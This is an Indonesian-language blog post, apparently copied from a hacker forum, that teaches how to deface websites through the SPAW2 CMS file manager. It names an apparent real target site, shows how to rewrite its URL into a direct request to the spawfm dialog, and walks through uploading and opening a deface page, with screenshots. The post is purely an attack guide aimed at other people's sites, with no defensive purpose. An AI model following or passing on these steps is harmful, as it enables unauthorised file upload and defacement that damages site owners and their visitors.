setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
![[Image: 216711_115497381863480_100002096566712_1...9466_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u4AfYOMTS-apL1UIsZUxb3Xf4iberAjVtZ2d-eZyhzQzu_mM_6ob0oHVflPQk2w0UqrEQYFYvOW1OeNtd3EskmNTf5dinNFS71r4J1_DfOTODuzLlFH70trDYxB8EexXmg52VVwDtoM-azFrDbgYGWV17DgOZuXImYxxgbiUa-OumrvBZrGOJUuGY=s0-d)
kemudian upload
![[Image: 207321_115498021863416_100002096566712_1...6993_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_trFgcxr1ydWxuh6ZQKxzyIXzq_y-lRiXxI0MQgKHLEqgO2KHS3Na3cnxwDDUO3GqHk7L0I8ga9ZnWnohtHWDgp4HSGS4YxCiAf2ui-VE58Fbu86u3Sd6s_gMG0GCKYFQBA_f61chB7siYHedtzcgNMfrNwIfSP9jH1L90x0LZWDE6705ucTEcdMncz=s0-d)
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
![[Image: 216507_115497471863471_100002096566712_1...7884_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vy4hQ6lzbJQKVbH506prGIIJlma875tzPQPGl3i3fSsLQyjmWynt4KURzePhHMN9gM5VOlk31GgrZV7ZrhXsFwik_f5hoDaqlNDfhDMgpEknYbtGn-mXhPgvq9lipidtLD9n4z8cXztFR6Ww8d7jpZpgIcHOaVpBqHtwOghhgYyP_5E_2n3cO1m5e4=s0-d)
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
![[Image: 217017_115499915196560_100002096566712_1...4444_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vrdHQp0TbPnVHki_5o0pyxed9n7IGkFO6-9sFsAEvJXY8IQSEJ_mAfyLhI1baQOxucCJ4L7xpaitjvl_Xkylvz1xh01jh2Y4EkVKC_lObWQNjOlP7c4OUkj-ACzMGjCT5ZOBhlo3-wKnuRK1tu83sbt6qKA-ls3J260d9dNHUYz9wT-y4iBKvlANZo=s0-d)
dan berikut hasil dari kerjaan diatas td :)
![[Image: 217060_115499768529908_100002096566712_1...3884_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tF188xhoLxzMOsNkAyLs-h9tWcg8TzOWR5mJXoM_QLux9wIIkWl2OK9hl7bnIfLe616VRgVzGrVpSiPHcfMCo3IsWpPH5q1IpLI1SiE7YIenDCtjziRTfaBLC4zRrzPXxwhP62zuqJ2COptX92BpvmCOHUWf4O2zmIg1QRELZ1eYlE-vqxJWy_33w5=s0-d)
semoga sukses
http://medancyberteam.web.id/forum/showthread.php?tid=27
Tidak ada komentar:
Posting Komentar